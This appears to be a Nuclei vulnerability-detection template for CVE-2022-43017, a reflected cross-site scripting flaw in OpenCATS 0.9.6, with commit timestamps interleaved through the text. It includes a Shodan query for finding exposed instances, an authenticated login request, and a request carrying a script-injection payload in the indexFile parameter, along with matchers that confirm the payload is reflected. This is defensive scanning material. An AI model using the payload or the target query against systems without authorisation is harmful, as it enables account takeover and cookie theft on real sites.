2022-10-24 12:52:19 +00:00
id : CVE-2022-43017
info :
2022-12-13 20:36:48 +00:00
name : OpenCATS 0.9.6 - Cross-Site Scripting
2022-10-24 12:52:19 +00:00
author : arafatansari
severity : medium
description : |
2022-12-13 20:36:48 +00:00
OpenCATS 0.9.6 contains a cross-site scripting vulnerability via the indexFile component. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
2022-10-24 12:52:19 +00:00
reference :
2022-10-24 20:19:49 +00:00
- https://github.com/hansmach1ne/opencats_zero-days/blob/main/XSS_in_indexFile.md
2022-10-25 09:01:17 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2022-43017
2022-10-25 09:31:07 +00:00
classification :
2022-10-25 12:56:02 +00:00
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score : 6.1
2022-10-25 09:31:07 +00:00
cve-id : CVE-2022-43017
2022-10-25 12:56:02 +00:00
cwe-id : CWE-79
2023-07-11 19:49:27 +00:00
epss-score : 0.00071
cpe : cpe:2.3:a:opencats:opencats:0.9.6:*:*:*:*:*:*:*
2023-08-31 11:46:18 +00:00
epss-percentile : 0.29005
2022-10-24 20:19:49 +00:00
metadata :
2023-04-28 08:11:21 +00:00
max-request : 2
2022-10-24 20:19:49 +00:00
shodan-query : title:"OpenCATS"
2023-06-04 08:13:42 +00:00
verified : true
2023-07-11 19:49:27 +00:00
vendor : opencats
product : opencats
2022-10-25 09:01:17 +00:00
tags : cve,cve2022,xss,opencats,authenticated
2022-10-24 12:52:19 +00:00
2023-04-27 04:28:59 +00:00
http :
2022-10-24 12:52:19 +00:00
- raw :
- |
POST /index.php?m=login&a=attemptLogin HTTP/1.1
Host : {{Hostname}}
Content-Type : application/x-www-form-urlencoded
2022-10-25 09:01:17 +00:00
username={{username}}&password={{password}}
2022-10-24 12:52:19 +00:00
- |
2022-10-24 20:19:49 +00:00
GET /ajax.php?f=getPipelineJobOrder&joborderID=1&page=0&entriesPerPage=1&sortBy=dateCreatedInt&sortDirection=desc&indexFile=15)"></a><script>alert(document.domain)</script>&isPopup=0 HTTP/1.1
2022-10-24 12:52:19 +00:00
Host : {{Hostname}}
cookie-reuse : true
2023-07-11 19:49:27 +00:00
2022-10-24 12:52:19 +00:00
matchers-condition : and
matchers :
2022-10-24 20:19:49 +00:00
- type : word
part : body
words :
- '<script>alert(document.domain)</script>'
- 'CATS='
condition : and
2022-10-24 12:52:19 +00:00
- type : word
2022-10-24 20:19:49 +00:00
part : header
2022-10-24 12:52:19 +00:00
words :
2022-10-24 20:19:49 +00:00
- "text/html"
- type : status
status :
- 200